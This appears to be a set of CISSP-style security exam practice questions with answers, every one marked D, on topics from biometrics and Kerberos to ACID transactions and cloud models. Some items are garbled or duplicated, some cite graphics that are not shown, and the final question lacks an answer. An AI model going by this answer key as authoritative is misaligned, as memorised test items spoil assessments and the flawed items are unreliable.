What does positive pressurization pertaining to ventilation mean? A. When a door opens, the air comes in. B. When a fire takes place, the power supply is disabled. C. When a fire takes place, the smoke is diverted to one room. D. When a door opens, the air goes out.

D. Positive pressurization means that when someone opens a door, the air goes out, and outside air does not come in. If a facility were on fire and the doors were opened, positive pressure would cause the smoke to go out instead of being pushed back into the building.

Which of the following criteria is the most important consideration for the selection and deployment of a biometric authentication system? A. False acceptance rate (FAR) or Type II error rate B..False rejection rate (FRR) or Type I error rate C. Crossover error rate (CER) or equal error rate (EER) D. Processing speed

D. Processing speed is the length of time it takes a biometric system to actually authenticate a user upon the presentation of the body part. Regardless of how well a system can be tuned with respect to FAR, FRR, or CER, unless the system can process a sufficient throughput of individuals in actual deployment, it will become a costly bottleneck. Much as different systems have different thresholds for accuracy, they have differing thresholds for throughput, based on the body part being used for authentication.

There are several security enforcement components that are commonly built into operating systems. Which component is illustrated in the graphic that follows? A.Virtual machines. B. interrupt. C. Cache memory. D. Protection Rings.

D. Protection Rings.

Which of the following correctly describes the difference between public key cryptography and public key infrastructure? A. Public key cryptography is the use of an asymmetric algorithm, while public key infrastructure is the use of a symmetric algorithm. B. Public key cryptography is used to create public/private key pairs, while public key infrastructure is used to perform key exchange and integrity. C. public key cryptography provides authentication and nonrepudiation, while public key infrastructure provides confidentiality and integrity. D. Public key cryptography is another name for asymmetric cryptography, while public key infrastructure consists of public key cryptographic mechanisms.

D. Public key cryptography is another name for asymmetric cryptography, while public key infrastructure consists of public key cryptographic mechanisms.

Which of the following has an incorrect definition mapping? A. zeroization - overwriting with a pattern designed to ensure that the data formerly on the media are not practically recoverable. B. Degaussing - magnetic scrambling of the patterns on a tape or disk that represent the information stored there. C. Destruction - shredding, crushing, burning. D. Purging - making information recoverable with extraordinary effort such as physical forensics in a laboratory.

D. Purging - making information recoverable with extraordinary effort such as physical forensics in a laboratory.

which of the following refers to the data left on the media after the media has been erased? A. semi-hidden. B. dregs. C. sticky bits. D. residual

D. Residual.

Which of the following is a responsibility of the memory manager? A use complex controls to ensure integrity and confidentiality when processes need to use the same shared memory segments? B. limit processes to interact only with the memory segments assigned to them. C. Swap contents from RAM to the hard drive as needed. D. Run an algorithm to identify unused committed memory and inform the operating system that the memory is available.

D. Run an algorithm to identify unused committed memory and inform the operating system that the memory is available.

Which of the following roles has the responsibility for implementing and maintaining firewalls? A. Security supervisor B. System owner C. Data Custodian D. Security Administrator.

D. Security Administrator.

The company's partners need to integrate compatible authentication functionality into their web portals to allow for interoperability across the different company boundaries. Which of the following will deal with this issue? A. Service Provisioning Markup Language B. Simple Object Access Protocol C. Extensible Access Control Markup Language D. Security Assertion Markup Language

D. Security Assertion Markup Language allows the exchange of authentication and authorization data to be shared between security domains. It is one of the most commonly used approaches to allow for single sign-on capabilities within a web-based environment.

It is important that organizations ensure that their security efforts are effective and measurable. Which of the following is not a common method used to track the effectiveness of security efforts? A. Service level agreement B. Return on investment C. Balanced scorecard system D. Provisioning system

D. Security effectiveness deals with metrics, meeting service level agreement (SLA) requirements, achieving return on investment (ROI), meeting set baselines, and providing management with a dashboard or balanced scorecard system. These are ways to determine how useful the current security solutions and architecture as a whole are performing.

Use the following scenario to answer Questions 16-18. A server that houses sensitive data has been stored in an unlocked room for the last few years at Company A. The door to the room has a sign on the door that reads "Room 1." This sign was placed on the door with the hope that people would not look for important servers in this room. Realizing this is not optimum security, the company has decided to install a reinforced lock and server cage for the server and remove the sign. The company has also hardened the server's configuration and employed strict operating system access controls. The fact that the server has been in an unlocked room marked "Room 1" for the last few years means the company was practicing which of the following? A. Logical security B. Risk management C. Risk transference D. Security through obscurity

D. Security through obscurity

Which of the following multiplexing technologies analyzes statistics related to the typical workload of each input device and makes real-time decisions on how much time each device should be allocated for data transmission? A. Time-division multiplexing B. Wave-division multiplexing C. Frequency-division multiplexing D. Statistical time-division multiplexing

D. Statistical time-division multiplexing (STDM) transmits several types of data simultaneously across a single transmission line. STDM technologies analyze statistics related to the typical workload of each input device and make real-time decisions on how much time each device should be allocated for data transmission.

Synthetic transactions are best described as A. Real user monitoring (RUM) B. Transactions that fall outside the normal purpose of a system C. Transactions that are synthesized from multiple users' interactions with the system D. A way to test the behavior and performance of critical services

D. Synthetic transactions are those that simulate the behavior of real users, but are not the result of real user interactions with the system. They allow an organization to ensure that services are behaving properly without having to rely on user complaints to detect problems.

Which of the following protocols is considered connection-oriented? A. IP B. ICMP C. UDP D. TCP

D. TCP is the only connection-oriented protocol listed. A connection-oriented protocol provides reliable connectivity and data transmission, while a connectionless protocol provides unreliable connections and does not promise or ensure data transmission.

Which of the following best describes TCP versus UDP? A. TCP provides more services and is more reliable, but UDP provides more security services. B. TCP provides a best-effort delivery, and UDP sets up a virtual connection with the destination. C. TCP is reliable, and UDP deals with flow control and ACKs. D. TCP provides more services and is more reliable in data transmission, whereas UDP takes less resources and overhead to transmit data.

D. TCP provides more services and is more reliable in data transmission, whereas UDP takes less resources and overhead to transmit data.

Which of the following is a purpose of the transport layer? A. The hop-by-hop delivery of packets from one network to another B. Representing data in a structure that can be understood by processes at the endpoints C. Encapsulating the IP packet for transport D. Ensuring reliable data transfer

D. TCP, at the transport layer, provides for reliable data segment delivery, sequencing, and flow control, among other assurances.

Which attack inserts an irrational value into an oversized packet, making it difficult for the destination router to reassemble it? A. Remedy B. Ping of death C. Garble D. Teardrop

D. Teardrop

What is social engineering? A. Creating functional social relationships on the workplace in order to facilitate better productivity. B. Techniques designed to convince employees who do not cooperate well to get along better. C. Undermining enterprise productivity by subverting social processes. D. Techniques designed to manipulate employees so that they violate security protocols.

D. Techniques designed to manipulate employees so that they violate security protocols.

Guidelines should be followed to allow secure remote administration. Which of the following is not one of those guidelines? A. A small number of administrators should be allowed to carry out remote functionality. B. Critical systems should be administered locally instead of remotely. C. Strong authentication should be in place. D. Telnet should be used to send commands and data.

D. Telnet should not be allowed for remote administration because it sends all data, including administrator credentials, in cleartext. This type of communication should go over more secure protocols, as in SSH.

When multiple databases exchange transactions, each database is updated. This can happen many times and in many different ways. To protect the integrity of the data, databases should incorporate a concept known as an ACID test. What does this acronym stand for? A. Availability, confidentiality, integrity, durability B. Availability, consistency, integrity, durability C. Atomicity, confidentiality, isolation, durability D. Atomicity, consistency, isolation, durability

D. The ACID test concept should be incorporated into the software of a database. ACID stands for: Atomicity Divides transactions into units of work and ensures that either all modifications take effect or none take effect. Either the changes are committed or the database is rolled back. Consistency A transaction must follow the integrity policy developed for that particular database and ensure that all data is consistent in the different databases. Isolation Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed. Durability Once the transaction is verified as accurate on all systems, it is committed and the databases cannot be rolled back.

Which of the following is true about information flow models? A. The simple security rule of Bell-LaPadula dictates that a subject may not read data from a higher security level, in order to implement data integrity. B. The *-integrity rule of Biba dictates that a subject may not write data to an object at a higher integrity level, in order to implement confidentiality. C. The simple integrity rule of Biba dictates that a subject cannot write data to a lower integrity level, in order to implement integrity. D. The *-property rule of Bell-LaPadula dictates that a subject cannot write data to a lower security level, in order to implement confidentiality.

D. The Bell-LaPadula model is concerned with confidentiality, and the *-property rule dictates "no write down" in order to avoid declassifying data.

Which access control method is considered user-directed? A. Nondiscretionary B. Mandatory C. Identity-based D. Discretionary

D. The DAC model allows users, or data owners, the discretion of letting other users access their resources. DAC is implemented by ACLs, which the data owner can configure.

The approach of employing an integrated product team (IPT) for software development is designed to achieve which of the following objectives? A. Developing and testing software with fewer security flaws B. Developing and testing software with fewer defective features C. Developing and testing software that will be most profitable D. Developing and testing software best suited to the deployment environment

D. The IPT approach to the integration between development and operations (DevOps) is specifically designed to ensure that the development team is building software in an environment that is as close as possible to the deployment environment and understands the deployment environment's operational necessities.

Which of the following frameworks is a two-dimensional model that uses six basic communication interrogatives intersecting with different viewpoints to give a holistic understanding of the enterprise? A. SABSA B. TOGAF C. CMMI D. Zachman

D. The Zachman Framework is a two-dimensional model that uses six basic communication interrogatives (What, How, Where, Who, When, and Why) intersecting with different viewpoints (Planner, Owner, Designer, Builder, Implementer, and User) to give a holistic understanding of the enterprise. This framework was developed in the 1980s and is based on the principles of classical business architecture that contain rules that govern an ordered set of relationships.

Metro Ethernet is a MAN protocol that can work in network infrastructures made up of access, aggregation, metro, and core layers. Which of the following best describes these network infrastructure layers? A. The access layer connects the customer's equipment to a service provider's aggregation network. B. Aggregation occurs on a core network. The metro layer is the metropolitan area network. The core connects different metro networks. C. The access layer connects the customer's equipment to a service provider's core network. Aggregation occurs on a distribution network at the core. The metro layer is the metropolitan area network. D. The access layer connects the customer's equipment to a service provider's aggregation network. Aggregation occurs on a distribution network. The metro layer is the metropolitan area network. The core connects different access layers. The access layer connects the customer's equipment to a service provider's aggregation network. Aggregation occurs on a distribution network. The metro layer is the metropolitan area network. The core connects different metro networks.

D. The access layer connects the customer's equipment to a service provider's aggregation network. Aggregation occurs on a distribution network. The metro layer is the metropolitan area network. The core connects different metro networks.

In a VoIP environment, the Real-time Transport Protocol (RTP) and RTP Control Protocol (RTCP) are commonly used. Which of the following best describes the difference between these two protocols? A. RTCP provides a standardized packet format for delivering audio and video over IP networks. RTP provides out-of-band statistics and control information to provide feedback on QoS levels. B. RTP provides a standardized packet format for delivering data over IP networks. RTCP provides control information to provide feedback on QoS levels. C. RTP provides a standardized packet format for delivering audio and video over MPLS networks. RTCP provides control information to provide feedback on QoS levels. D. RTP provides a standardized packet format for delivering audio and video over IP networks. RTCP provides out-of-band statistics and control information to provide feedback on QoS levels.

D. The actual voice stream is carried on media protocols such as the Real-time Transport Protocol (RTP). RTP provides a standardized packet format for delivering audio and video over IP networks. RTP is a session layer protocol that carries data in media stream format, as in audio and video, and is used extensively in VoIP, telephony, video conferencing, and other multimedia streaming technologies. It provides end-to-end delivery services and is commonly run over the transport layer protocol UDP. RTP Control Protocol (RTCP) is used in conjunction with RTP and is also considered a session layer protocol. It provides out-of-band statistics and control information to provide feedback on QoS levels of individual streaming multimedia sessions.

On your first day in a new job, you are invited to a meeting with attorneys representing a company for which your company provides infrastructure services. You learn that there is a major investigation underway into allegations that one of your company's system administrators improperly accessed mailboxes belonging to this client. Based on what you know so far, which type of investigation is this likeliest to be? A. Administrative B. Regulatory C. Criminal D. Civil

D. The allegations, depending on the details, could point to any of the four types of investigations. However, since you are meeting with attorneys representing this client, it is likeliest that they are considering (or taking) civil action against your company. None of the other three types of investigations would normally involve meetings with a client's attorneys. As an aside, in this situation you would obviously want to ensure that your own company's attorneys were present too.

Which of the following attack types best describes what commonly takes place when you insert specially crafted and excessively long data into an input field? A. Traversal attack B. Unicode encoding attack C. URL encoding attack D. Buffer overflow attack

D. The buffer overflow is probably the most notorious of input validation mistakes. A buffer is an area reserved by an application to store something in it, such as some user input. After the application receives the input, an instruction pointer points the application to do something with the input that's been put in the buffer. A buffer overflow occurs when an application erroneously allows an invalid amount of input to be written into the buffer area, overwriting the instruction pointer in the code that tells the program what to do with the input. Once the instruction pointer is overwritten, whatever code has been placed in the buffer can then be executed, all under the security context of the application.

What type of telecommunication technology is illustrated in the graphic that follows? A. Digital Subscriber Line B. Integrated Services Digital Network C. BRI ISDN D. Cable modem

D. The cable television companies have been delivering television services to homes for years, and then they started delivering data transmission services for users who have cable modems and want to connect to the Internet at high speeds. Cable modems provide high-speed access, up to 50 Mbps, to the Internet through existing cable coaxial and fiber lines. The cable modem provides upstream and downstream conversions. Not all cable companies provide Internet access as a service, mainly because they have not upgraded their infrastructure to move from a one-way network to a two-way network. Once this conversion takes place, data can come down from a central point (referred to as the head) to a residential home and back up to the head and onto the Internet.

ISO/IEC 27000 is a growing family of ISO/IEC information security management system (ISMS) standards. It comprises information security standards published jointly by the International Organization for Standardization (ISO) and the International Electrotechnical Commission (IEC). Which of the following provides an incorrect mapping of the individual standards that make up this family of standards? A. ISO/IEC 27002: Code of practice for information security management B. ISO/IEC 27003: Guideline for ISMS implementation C. ISO/IEC 27004: Guideline for information security management measurement and metrics framework D. ISO/IEC 27005: Guideline for bodies providing audit and certification of information security management systems

D. The correct mappings for the individual standards are as follows: ISO/IEC 27002: Code of practice for information security management ISO/IEC 27003: Guideline for ISMS implementation ISO/IEC 27004: Guideline for information security management measurement and metrics framework ISO/IEC 27005: Guideline for information security risk management ISO/IEC 27006: Guideline for bodies providing audit and certification of information security management systems

A risk management program must be developed properly and in the right sequence. Which of the following provides the correct sequence for the steps listed? Develop a risk management team. Calculate the value of each asset. Identify the vulnerabilities and threats that can affect the identified assets. Identify company assets to be assessed. A. i, iii, ii, iv B. ii, i, iv, iii C. iii, i, iv, ii D. i, iv, ii, iii

D. The correct steps for setting up a risk management program are as follows: Develop a risk management team. Identify company assets to be assessed. Calculate the value of each asset. Identify the vulnerabilities and threats that can affect the identified assets.

Of the following steps that describe the development of a botnet, which best describes the step that comes first? A. Infected server sends attack commands to the botnet. B. Spammer pays a hacker for use of a botnet. C. Controller server instructs infected systems to send spam to mail servers. D. Malicious code is sent out that has bot software as its payload.

D. The creation of a botnet begins with the hacker sending systems malicious code that has the bot software as its payload. A bot is a piece of dormant code that carries out functionality for its master. Also known as a zombie, the code can be used to forward items sent to it as in spam or attack commands. The zombie code sends a message to the attacker indicating that a specific system has been compromised and can be used by the attacker. When an attacker has a collection of these compromised systems, it is referred to as a botnet.

Layer 2 of the OSI model has two sublayers. What are those sublayers, and what are two IEEE standards that describe technologies at that layer? A. LCL and MAC; IEEE 802.2 and 802.3 B. LCL and MAC; IEEE 802.1 and 802.3 C.Network and MAC; IEEE 802.1 and 802.3 D. LLC and MAC; IEEE 802.2 and 802.3

D. The data link layer, or Layer 2, of the OSI model is responsible for adding a header and a trailer to a packet to prepare the packet for the local area network or wide area network technology binary format for proper line transmission. Layer 2 is divided into two functional sublayers. The upper sublayer is the Logical Link Control (LLC) and is defined in the IEEE 802.2 specification. It communicates with the network layer, which is immediately above the data link layer. Below the LLC is the Media Access Control (MAC) sublayer, which specifies the interface with the protocol requirements of the physical layer. Thus, the specification for this layer depends on the technology of the physical layer. The IEEE MAC specification for Ethernet is 802.3, Token Ring is 802.5, wireless LAN is 802.11, and so on. When you see a reference to an IEEE standard, such as 802.11 or 802.16, it refers to the protocol working at the MAC sublayer of the data link layer of the protocol stack.

Layer 2 of the OSI model has two sublayers. What are those sublayers, and what are two IEEE standards that describe technologies at that layer? A.LCL and MAC; IEEE 802.2 and 802.3 B.LCL and MAC; IEEE 802.1 and 802.3 C.Network and MAC; IEEE 802.1 and 802.3 D. LLC and MAC; IEEE 802.2 and 802.3

D. The data link layer, or Layer 2, of the OSI model is responsible for adding a header and a trailer to a packet to prepare the packet for the local area network or wide area network technology binary format for proper line transmission. Layer 2 is divided into two functional sublayers. The upper sublayer is the Logical Link Control (LLC) and is defined in the IEEE 802.2 specification. It communicates with the network layer, which is immediately above the data link layer. Below the LLC is the Media Access Control (MAC) sublayer, which specifies the interface with the protocol requirements of the physical layer. Thus, the specification for this layer depends on the technology of the physical layer. The IEEE MAC specification for Ethernet is 802.3, Token Ring is 802.5, wireless LAN is 802.11, and so on. When you see a reference to an IEEE standard, such as 802.11 or 802.16, it refers to the protocol working at the MAC sublayer of the data link layer of the protocol stack.

There are two main functions that Trusted Platform Modules (TPMs) carry out within systems today. Which of the following best describes these two functions? A. Sealing a hard disk drive is when the decryption key that can be used to decrypt data on the drive is stored on the TPM. Binding is when data pertaining to the system's state is hashed and stored on the TPM. B. Binding a hard disk drive is when whole-disk encryption is enabled through the use of the TPM. Sealing is when a digital certificate is sealed within a TPM and the system cannot boot up without this certificate being validated. C. Sealing a hard disk drive is when whole-disk encryption is enabled through the use of the TPM. Binding is when a digital certificate is sealed within a TPM and the system cannot boot up without this certificate being validated. D. Binding a hard disk drive is when the decryption key that can be used to decrypt data on the drive is stored on the TPM. Sealing is when data pertaining to the system's state is hashed and stored on the TPM.

D. The essence of the TPM lies in a protected and encapsulated microcontroller security chip that provides a safe haven for storing and processing security-intensive data such as keys, passwords, and digital certificates. "Binding" a hard disk drive is the most common usage scenario of the TPM—where the content of a given hard disk drive is affixed with a particular computing system. Another application of the TPM is "sealing" a system's state to a particular hardware and software configuration.

Who was involved in developing the first public key algorithm? A. Adi Shamir B. Ross Anderson C. Bruce Schneier D. Martin Hellman

D. The first released public key cryptography algorithm was developed by Whitfield Diffie and Martin Hellman.

Databases can record transactions in real time, which usually updates more than one database in a distributed environment. This type of complexity can introduce many integrity threats, so the database software should implement the characteristics of what's known as the ACID test. Which of the following are incorrect characteristics of the ACID test? Atomicity Divides transactions into units of work and ensures that all modifications take effect or none takes effect. Consistency A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases. See the answer Transactions execute in isolation until completed, without interacting with other transactions. Durability Once the transaction is verified as inaccurate on all systems, it is committed and the databases cannot be rolled back. A. i, ii B. ii. iii C. ii, iv D. iv

D. The following are correct characteristics of the ACID test: Atomicity Divides transactions into units of work and ensures that all modifications take effect or none take effect. Either the changes are committed or the database is rolled back. Consistency A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases. Isolation Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed. Durability Once the transaction is verified as accurate on all systems, it is committed and the databases cannot be rolled back.

You come across an advanced piece of polymorphic malware that uses a custom communications protocol for network traffic. This protocol has a distinctive signature in its header. Which tool is best suited to mitigate this malware by preventing the packets from traversing the network? A. Antimalware B. Stateful firewall C. Intrusion detection system (IDS) D. Intrusion prevention system (IPS)

D. The intrusion prevention system is the best answer because these systems can stop packets containing specific signatures. Although some antimalware software might be able to this also, this functionality is not a universal feature in this sort of solution.

Instead of managing and maintaining many different types of security products and solutions, Joan wants to purchase a product that combines many technologies into one appliance. She would like to have centralized control, streamlined maintenance, and a reduction in stove pipe security solutions. Which of the following would best fit Joan's needs? A. Dedicated appliance B. Centralized hybrid firewall applications C. Hybrid IDS\IPS integration D. Unified threat management

D. The list of security solutions most companies need includes, but is not limited to, firewalls, antimalware, antispam, IDS\IPS, content filtering, data leak prevention, VPN capabilities, continuous monitoring, and reporting. Unified threat management (UTM) appliance products have been developed that provide all (or many) of these functionalities into a single network appliance. The goals of UTM are simplicity, streamlined installation and maintenance, centralized control, and the ability to understand a network's security from a holistic point of view.

What is the difference between security training and a security awareness program, and which is most important? A. A security awareness program addresses all employees regardless of role, whereas security training is role-specific. The awareness program is most important. B. A security awareness program focuses on specific roles, whereas security training addresses the needs of all employees. Both are equally important. C. A security awareness program focuses on specific roles, whereas security training addresses the needs of all employees. Training is most important. D. A security awareness program addresses all employees regardless of role, whereas security training is role-specific. Both are equally important.

D. The main difference between a security awareness program and security training is the focus on employee role. All employees have a role in maintaining enterprise security, so awareness of the threats and their responsibilities to be mindful of them is the goal of an awareness program. Conversely, some employee roles require skill-specific training in security because it is an inherent part of their job. This requires specific security training. Regardless of the difference between the two, both are absolutely equally required for an enterprise to be secure.

There are common cloud computing service models. __________________ usually requires companies to deploy their own operating systems, applications, and software onto the provided infrastructure. __________________ is the software environment that runs on top of the infrastructure. In the __________________ model the provider commonly gives the customers network-based access to a single copy of an application. A. Platform as a Service, Infrastructure as a Service, Software as a Service B. Platform as a Service, Platform as Software, Application as a Service C. Infrastructure as a Service, Application as a Service, Software as a Service D. Infrastructure as a Service, Platform as a Service, Software as a Service

D. The most common cloud service models are Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS).

If SSL is being used to encrypt ed the messages that are transmitted over the network, what is the . major concern of the security professional? A. The network segments that have systems that use different versions of SSL. B. If the user encrypted the message with an application layer product, it will be incompatible with SSL. C. Network tapping and wiretapping D. The network segments that the message will travel on that the company does not control.

D. The network segments that the message will travel on that the company does not control.

If SSL is being used to encrypt messages that are transmitted over the network, what is a major concern of the security professional? A. The network segments that have systems that use different versions of SSL. B. If the user encrypted the message with an application layer product, it will be incompatible with SSL. C. Network tapping and wiretapping. D. The network segments that the message will travel on that the company does not control.

D. The network segments that the message will travel on that the company does not control.

Which of the following unauthorized activities have most likely been taking place in this situation? A. DNS querying B. Phishing C. Forwarding D. Zone transfer

D. The primary and secondary DNS servers synchronize their information through a zone transfer. After changes take place to the primary DNS server, those changes must be replicated to the secondary DNS server. It is important to configure the DNS server to allow zone transfers to take place only between the specific servers. Attackers can carry out zone transfers to gather very useful network information from victims' DNS servers. Unauthorized zone transfers can take place if the DNS servers are not properly configured to restrict this type of activity.

David is preparing a server room at a new branch office. What locking mechanism should he use for the primary and secondary server room entry doors? A. The primary and secondary entrance doors should have access controlled through a swipe or cipher lock. B. The primary entrance door should have access controlled through a security guard. The secondary doors should be secured from the inside and allow no entry. C. The primary entrance door should have access controlled through a swipe card or cipher lock. The secondary doors should have a security guard. D. The primary entrance door should have access controlled through a swipe card or cipher lock. Secondary doors should be secured from the inside and allow no entry.

D. The primary entrance door should have access controlled through a swipe card or cipher lock. Secondary doors should be secured from the inside and allow no entry.

Business continuity plans address all of the following except: A. Critical servers used on the company's LAN B. The most critical devices housed in the main data center. C. Individual workstations that are used by operations personnel D. The protection of cold sites at a remote location.

D. The protection of cold sites at a remote location.

When classifying an information asset, which of the following is true concerning its sensitivity? A. It is commensurate with how its loss would impact the fundamental business processes of the organization. B. It is determined by its replacement cost. C. It is determined by the product of its replacement cost and the probability of its compromise. D. It is commensurate with the losses to an organization if it were revealed to unauthorized individuals.

D. The sensitivity of information is commensurate with the losses to an organization if that information were revealed to unauthorized individuals. Its criticality, on the other hand, is an indicator of how the loss of the information would impact the fundamental business processes of the organization. While replacement costs could factor into a determination of criticality, they almost never do when it comes to sensitivity.

Which of the following is normally not an element of e-Discovery? A. Identification B. Preservation C. Production D. Remanence

D. The steps normally involved in the discovery of electronically stored information, or e-Discovery, are identifying, preserving, collecting, processing, reviewing, analyzing, and producing the data in compliance of the court order. Data remanence is not part of e-Discovery, though it could influence the process.

John is a manager of the application development department within his company. He needs to make sure his team is carrying out all of the correct testing types and at the right times of the development stages. Which of the following accurately describe types of software testing that should be carried out? Unit testing Testing individual components in a controlled environment where programmers validate data structure, logic, and boundary conditions. Integration testing Verifying that components work together as outlined in design specifications. Acceptance testing Ensuring that the code meets customer requirements. Regression testing After a change to a system takes place, retesting to ensure functionality, performance, and protection. A. i, ii B. ii, iii C. i, ii, iv D. i, ii, iii, iv

D. There are different types of tests the software should go through because there are different potential flaws we will be looking for. The following are some of the most common testing approaches: Unit testing Testing individual components in a controlled environment where programmers validate data structure, logic, and boundary conditions Integration testing Verifying that components work together as outlined in design specifications Acceptance testing Ensuring that the code meets customer requirements Regression testing After a change to a system takes place, retesting to ensure functionality, performance, and protection

What needs to take place to an environment using XTACACS to be compatible with an environment using TACACS+? A. The use of RADIUS will allow for this conversion to take place. B. The use of Diameter will allow for this conversion to take place. C. They are backwards compatible, so no conversion is necessary. D. There is no interoperability between them. They are two totally different protocols.

D. There is no interoperability between them. They are two totally different protocols.

Kerberos is a commonly used access control and authentication technology. It is important to understand what the technology can and cannot do and its potential downfalls. Which of the following is not a potential security issue that must be addressed when using Kerberos? i.The KDC can be a single point of failure. ii.The KDC must be scalable. iii.Secret keys are temporarily stored on the users' workstations. iv. Kerberos is vulnerable to password guessing. A. i, iv B. iii C. All of them D. None of them

D. These are all issues that are directly related to Kerberos. These items are as follows: The KDC can be a single point of failure. If the KDC goes down, no one can access needed resources. Redundancy is necessary for the KDC. The KDC must be able to handle the number of requests it receives in a timely manner. It must be scalable. Secret keys are temporarily stored on the users' workstations, which means it is possible for an intruder to obtain these cryptographic keys. Session keys are decrypted and reside on the users' workstations, either in a cache or in a key table. Again, an intruder can capture these keys. Kerberos is vulnerable to password guessing. The KDC does not know if a dictionary attack is taking place.

Both block and stream algorithms use initialization vectors. Which of the following is not a reason that they are used? A. They are used to add randomness to the encryption process. B. They ensure that two identical plaintext values result in different cipher text values when encrypted with the same key. C. They provide extra protection in case an implementation is using the same symmetric key more than one time. D. They are XORed to the plaintext after encryption to ensure more randomness to the process.

D. They are XORed to the plaintext after encryption to ensure more randomness to the process.

What is the main advantage of using hot sites? A. costs are relatively low B. they can be used for an extended amount of time. C. They do not require that equipment and systems software be compatible with the primary installation being backed up. D. They can be made ready for operation quickly.

D. They can be made ready for operation quickly

Which of the following is not a critical purpose served by log collection, preservation, and review? A. They can be used to verify the ongoing consistency and effectiveness of security controls. B. They can be used to detect abnormal events that may indicate malicious activities. C. They can be used as part of an investigation into detected incidents to piece together a timeline of events. D. They can be used to monitor routine activities and system utilization.

D. They can be used to monitor routine activities and system utilization.

Which of the following is not true of application-level proxy firewalls? A. They provide a higher level of protection than circuit-level firewalls. B. They hide network information from external entities. C. one proxy per service is needed. D. They improve network performance.

D. They improve network performance.

Which of the following is not a reason why fax servers are used in many companies? A. They save money on individual fax devices and paper. B. They provide a secure way of faxing instead of having faxed paper sitting in bins waiting to be picked up. C. faxes can be routed to employee electronic mailboxes. D. They reduce the need for any other communication security mechanisms.

D. They reduce the need for any other communication security mechanisms.

In discretionary access control security, who has delegation authority to grant access to data? A. User B. Security officer C. Security policy D. Owner

D. This question may seem a little confusing if you were stuck between user and owner. Only the data owner can decide who can access the resources she owns. She may or may not be a user. A user is not necessarily the owner of the resource. Only the actual owner of the resource can dictate what subjects can actually access the resource.

Frank is responsible for the security of his company's online applications, web servers, and web-based activities. The web applications have the ca- pability of being dynamically "locked" so that multiple users cannot edit a web page at the same time and overwrite each other's work. An audit uncovered that although this software-locking capability was properly configured, multiple users were still able to modify the same web page at the same time. Which of the following best describes what is taking place in this situation? A. Buffer overflow. B. Blind SQL injection. C. Cross-site request forgery. D. Time of check/time of use attack

D. Time of check/time of use attack

Your company's CIO has stressed the need for an immediate incident response plan to be created. What is the best reason for this mandate? A. To improve the company's reputation with stockholders. B. To improve the executive team's compliance with due diligence regulations. C. To improve employee morale and retention. D. To improve the likelihood that the company could effectively react to a disruption.

D. To improve the likelihood that the company could effectively react to a disruption.

Which of the following attributes are added beyond traditional access control mechanisms (RBAC, MAC, and DAC) in order to implement ABAC? A. Subjects B. Objects C. Actions D. Context

D. Traditional methods such as role-based access control (RBAC), mandatory access control (MAC), and discretionary access control (DAC) each rely on categories of subjects and objects, and assign actions that can be performed based on combinations of the two. Attribute-based access control (ABAC) includes contexts, such as the time of day, the state or phase of a project, and other contextual events, in order to provide further granularity to which objects can be accessed by which subjects, when, and how.

The purpose of security awareness training is to expose personnel to security issues so that they may be able to recognize them and better respond to them. Which of the following is not normally a topic covered in security awareness training? A. Social engineering B. Phishing C. Whaling D. Trolling

D. Trolling is the term used to describe people who sow discord on various social platforms on the Internet by starting arguments or making inflammatory statements aimed at upsetting others. This is not a topic normally covered in security awareness training. Social engineering, phishing, and whaling are important topics to include in any security awareness program.

An attack that changes the source IP address of an ICMP echo request packet so it appears as though it came from the victim and is broadcasted to an amplifying network can be called all of the following except:. A. Smurf B.. ICMP storm C. DOS D. Tunneling

D. Tunneling

The biometric system has been known to accept imposters. This is known as which type of error? A CER B. Bio-acceptance error C. Type I D. Type II.

D. Type II.

Your biometric system has been known to accept imposters. This is known as which type of error? A. CER B. Bio-acceptance Error. C. Type I. D. Type II.

D. Type II.

Which of the following is not considered an operational assurance responsibility? A. separation of privileged and user program code. B. Auditing and monitoring capabilities. C. Trusted recovery when the product experiences unexpected circumstances. D. Unit and integration testing.

D. Unit and integration testing.

The operating system performs all except which of the following tasks? A. Memory allocation. B. Input and output tasks. C. Resource allocation. D. User access to database views.

D. User access to database views.

What are two types of wireless proximity identification devices? A. biometric devices and access control devices. B. Swipe card devices and passive devices C.Preset code devices and wireless devices D. User-activated devices and system sensing devices.

D. User-activated devices and system sensing devices.

COSO framework, developed by the Committee of Sponsoring Organizations (COSO) of the Tread way Commission in 1985 was developed to deal with fraudulent financial activities and reporting. The COSO framework is made up of the following components except: i. Control environment ii. risk assessment iii. Control activities iv. Information and communication V. Accreditation. A. iii, iv B. ii, V C. i, ii D. V

D. V

An accurate picture of the use and acceptance of biometrics is: A. relatively inexpensive, well received by society, and highly accurate. B. Very expensive, moderately received by society, and moderately accurate. C. Very expensive, very well received by society, and highly accurate. D. Very expensive, not well received by society, and highly accurate.

D. Very expensive, not well received by society, and highly accurate.

Which of the following is not a benefit of VoIP? A. Cost B. Convergence C. Flexibility D. Security

D. Voice over Internet Protocol (VoIP) refers to transmission technologies that deliver voice communications over IP networks. IP telephony uses technologies that are similar to TCP/IP, so its vulnerabilities are also similar. The voice system is vulnerable to application manipulation (such as toll fraud and blocking), unauthorized administrative access, and poor implementation. In terms of the network and media, it is also vulnerable to denial-of-service attacks against the gateways and network resources. Eavesdropping is also a concern, since data traffic is sent in cleartext unless it is encrypted.

Which of the following is a common association of the clark-wilson access model? A. Chinese wall. B. Access tuple. C. Read up and write down rule. D. Well-formed transactions.

D. Well-formed transactions.

Which of the following is the best countermeasure that John's team should implement to protect from improper caching issues? A. PKI B. DHCP snooping C. ARP protection D. DNSSEC

D. When a DNS server receives an improper (potentially malicious) name resolution response, it will cache it and provide it to all the hosts it serves unless DNSSEC is implemented. If DNSSEC were enabled on a DNS server, then the server would, upon receiving a response, validate the digital signature on the message before accepting the information to make sure that the response is from an authorized DNS server.

n computer programming, cohesion and coupling are used to describe modules of code. Which of the following is a favorable combination of cohesion and coupling? A. Low cohesion, low coupling B. High cohesion, high coupling C. Low cohesion, high coupling D. High cohesion, low coupling

